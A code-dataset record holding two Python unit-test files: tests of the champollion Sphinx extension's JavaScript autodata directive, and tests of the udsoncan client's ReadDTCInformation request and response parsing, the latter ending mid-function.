| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60cc15af01f7500379adf3061e66c6c28138a010
| 10,586
|
py
|
Python
|
test/unit/directive/test_directive_js_data.py
|
buddly27/champollion
|
aa53804ad11e32f1bb8dcb02668c6df3771efcaa
|
[
"Apache-2.0"
] | 3
|
2017-06-13T01:36:32.000Z
|
2020-12-14T18:26:01.000Z
|
test/unit/directive/test_directive_js_data.py
|
buddly27/champollion
|
aa53804ad11e32f1bb8dcb02668c6df3771efcaa
|
[
"Apache-2.0"
] | 1
|
2018-09-27T16:13:48.000Z
|
2020-06-03T22:27:56.000Z
|
test/unit/directive/test_directive_js_data.py
|
buddly27/champollion
|
aa53804ad11e32f1bb8dcb02668c6df3771efcaa
|
[
"Apache-2.0"
] | null | null | null |
# :coding: utf-8
import os
import pytest
from sphinx.cmd.build import main as sphinx_main
from sphinx.util.osutil import cd
import utility
@pytest.fixture()
def doc_folder_with_code(doc_folder):
"""Return Doc folder with Javascript example source code.
"""
js_source = os.path.join(doc_folder, "example")
with open(os.path.join(js_source, "index.js"), "w") as f:
f.write(
"/**\n"
" * A variable\n"
" *\n"
" * .. note::\n"
" *\n"
" * A note.\n"
" */\n"
"export default const VARIABLE_INT = 42;\n"
"\n"
"/**\n"
" * Another variable\n"
" *\n"
" * A citation::\n"
" *\n"
" * A citation\n"
" */\n"
"var VARIABLE_OBJECT = {\n"
" key1: 'value1',\n"
" key2: 'value2',\n"
" key3: 'value3',\n"
"};\n"
"\n"
"export let VARIABLE_STRING = 'rosebud';\n"
)
return doc_folder
def test_directive_autodata(doc_folder_with_code):
"""Generate documentation from global data variables.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT = 42\n"
"\n"
" \"import VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_alias(doc_folder_with_code):
"""Generate documentation from global data variables with alias.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :alias: ALIASED_VARIABLE_INT\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :alias: ALIASED_VARIABLE_OBJECT\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :alias: ALIASED_VARIABLE_STRING\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.ALIASED_VARIABLE_INT = 42\n"
"\n"
" \"import ALIASED_VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.ALIASED_VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.ALIASED_VARIABLE_STRING = rosebud\n"
"\n"
" \"import {ALIASED_VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_module_alias(doc_folder_with_code):
"""Generate documentation from global data variables with module alias.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :module-alias: alias_module\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :module-alias: alias_module\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :module-alias: alias_module\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const alias_module.VARIABLE_INT = 42\n"
"\n"
" \"import VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var alias_module.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let alias_module.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_module_path_alias(doc_folder_with_code):
"""Generate documentation from global data variables with module path alias.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :module-path-alias: test/alias/module\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :module-path-alias: test/alias/module\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :module-path-alias: test/alias/module\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT = 42\n"
"\n"
" \"import VARIABLE_INT from \"test/alias/module\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"test/alias/module\"\"\n"
)
def test_directive_autodata_with_partial_import_forced(doc_folder_with_code):
"""Generate documentation from global data variables with partial import
forced.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :force-partial-import:\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :force-partial-import:\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :force-partial-import:\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT = 42\n"
"\n"
" \"import {VARIABLE_INT} from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT = { "
"key1: value1, key2: value2, key3: value3, }\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING = rosebud\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
def test_directive_autodata_with_value_skipped(doc_folder_with_code):
"""Generate documentation from global data variables with value skipped.
"""
index_file = os.path.join(doc_folder_with_code, "index.rst")
with open(index_file, "w") as f:
f.write(
".. js:autodata:: example.VARIABLE_INT\n"
" :skip-value:\n"
"\n"
".. js:autodata:: example.VARIABLE_OBJECT\n"
" :skip-value:\n"
"\n"
".. js:autodata:: example.VARIABLE_STRING\n"
" :skip-value:\n"
)
with cd(doc_folder_with_code):
sphinx_main(["-c", ".", "-b", "text", "-E", ".", "_build"])
with open(
os.path.join(doc_folder_with_code, "_build", "index.txt"), "rb"
) as f:
content = utility.sanitize_value(f.read())
assert content == (
"const example.VARIABLE_INT\n"
"\n"
" \"import VARIABLE_INT from \"example\"\"\n"
"\n"
" A variable\n"
"\n"
" Note:\n"
"\n"
" A note.\n"
"\n"
"var example.VARIABLE_OBJECT\n"
"\n"
" Another variable\n"
"\n"
" A citation:\n"
"\n"
" A citation\n"
"\n"
"let example.VARIABLE_STRING\n"
"\n"
" \"import {VARIABLE_STRING} from \"example\"\"\n"
)
| 30.862974
| 80
| 0.473361
| 1,140
| 10,586
| 4.208772
| 0.074561
| 0.034181
| 0.016882
| 0.088579
| 0.887662
| 0.862026
| 0.844519
| 0.844519
| 0.829304
| 0.814089
| 0
| 0.007431
| 0.377102
| 10,586
| 342
| 81
| 30.953216
| 0.7202
| 0.04761
| 0
| 0.795848
| 0
| 0
| 0.35668
| 0.095347
| 0
| 0
| 0
| 0
| 0.020761
| 1
| 0.024221
| false
| 0
| 0.072664
| 0
| 0.100346
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60f6fcf7e510245d4a699aaff5ff21f04bd0ca60
| 125,128
|
py
|
Python
|
test/client/test_read_dtc_information.py
|
autopi-io/py-udsoncan
|
2351ee02bf4a70e5661d6fd5f48f58db740f244e
|
[
"MIT"
] | 1
|
2021-03-21T12:18:23.000Z
|
2021-03-21T12:18:23.000Z
|
test/client/test_read_dtc_information.py
|
autopi-io/py-udsoncan
|
2351ee02bf4a70e5661d6fd5f48f58db740f244e
|
[
"MIT"
] | null | null | null |
test/client/test_read_dtc_information.py
|
autopi-io/py-udsoncan
|
2351ee02bf4a70e5661d6fd5f48f58db740f244e
|
[
"MIT"
] | null | null | null |
from __future__ import with_statement
from __future__ import absolute_import
from udsoncan.client import Client
from udsoncan import services, DidCodec
from udsoncan.exceptions import *
from test.ClientServerTest import ClientServerTest
from udsoncan import Dtc
import struct
class GenericTest_RequestStatusMask_ResponseNumberOfDTC(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def test_normal_behaviour_param_int(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x01\x12\x34")
def _test_normal_behaviour_param_int(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x01\x12\x34")
def _test_normal_behaviour_param_instance(self):
response = getattr(self.udsclient, self.client_function).__call__(Dtc.Status(test_failed_this_operation_cycle = True, confirmed = True, test_not_completed_since_last_clear = True, test_not_completed_this_operation_cycle = True))
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_harmless_extra_byte(self):
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01\x12\x34\x00\x11\x22")
def _test_normal_behaviour_harmless_extra_byte(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_bad_response_subfn_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB\x01\x12\x34")
def _test_bad_response_subfn_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_subfn_no_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB\x01\x12\x34")
def _test_bad_response_subfn_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB\x01\x12\x34")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB\x01\x12\x34")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_length_response_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
self.wait_request_and_respond("\x59"+self.sb+"\xFB")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01\x12")
def _test_bad_length_response_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_length_response_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
self.wait_request_and_respond("\x59"+self.sb+"\xFB")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01")
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x01\x12")
def _test_bad_length_response_no_exception(self):
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_mask(0x100)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_mask(-1)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_mask(u'aaa')
class TestReportNumberOfDTCByStatusMask(ClientServerTest, GenericTest_RequestStatusMask_ResponseNumberOfDTC): # Subfn = 0x1
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTest_RequestStatusMask_ResponseNumberOfDTC.__init__(self, subfunction=0x1, client_function = u'get_number_of_dtc_by_status_mask')
class GenericTestStatusMaskRequest_DtcAndStatusMaskResponse(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0xFB)
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[1].id, 0x123457)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x00)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(response.service_data.dtcs[2].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].severity.get_byte_as_int(), 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x12\x34\x56\x20\x12\x34\x57\x60")
def _test_normal_behaviour(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response)
def test_dtc_duplicate(self):
self.wait_request_and_respond("\x59"+self.sb+"\xFB\x12\x34\x56\x20\x12\x34\x56\x60")
def _test_dtc_duplicate(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. Server should avoid duplicate
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb+"\x5A")
self.conn.fromuserqueue.put("\x59"+self.sb+"\xFB\x12\x34\x56\x20\x12\x34\x57\x60")
def _test_normal_behaviour_param_instance(self):
getattr(self.udsclient, self.client_function).__call__(Dtc.Status(test_failed_this_operation_cycle = True, confirmed = True, test_not_completed_since_last_clear = True, test_not_completed_this_operation_cycle = True))
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, True, True]
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we ignore all 0 DTC, we consider case number 4 with 4 extra 0 like a valid answer just like these 0 were not ther
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
exception_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if exception_values[i]:
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
else:
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we ignore all 0 DTC, we consider case number 4 with 4 extra 0 like a valid answer just like these 0 were not ther
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
exception_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
if exception_values[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we consider all 0 DTC, case number 4 with 4 extra 0 bytes is a valid response where DTC ID=0
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
exception_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if exception_values[i]:
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
else:
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we consider all 0 DTC, case number 4 with 4 extra 0 bytes is a valid response where DTC ID=0
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
error_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
if error_values[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59"+self.sb+"\xFB")
def _test_no_dtc(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_length_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_exception(self):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_length_no_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertFalse(response.valid)
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(0x100)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(-1)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(u'aaa')
class TestReportDTCByStatusMask(ClientServerTest, GenericTestStatusMaskRequest_DtcAndStatusMaskResponse): # Subfn = 0x2
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestStatusMaskRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0x2, client_function = u'get_dtc_by_status_mask')
class TestReportDTCSnapshotIdentification(ClientServerTest): # Subfn = 0x3
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(len(response.service_data.dtcs[0].snapshots), 2)
self.assertEqual(response.service_data.dtcs[0].snapshots[0], 1)
self.assertEqual(response.service_data.dtcs[0].snapshots[1], 2)
self.assertEqual(response.service_data.dtcs[1].id, 0x789abc)
self.assertEqual(len(response.service_data.dtcs[1].snapshots), 1)
self.assertEqual(response.service_data.dtcs[1].snapshots[0], 3)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(len(response.service_data.dtcs[2].snapshots), 1)
self.assertEqual(response.service_data.dtcs[2].snapshots[0], 0)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x03")
self.conn.fromuserqueue.put("\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03")
def _test_normal_behaviour(self):
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, True, True]
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_identification()
else:
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_identification()
else:
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
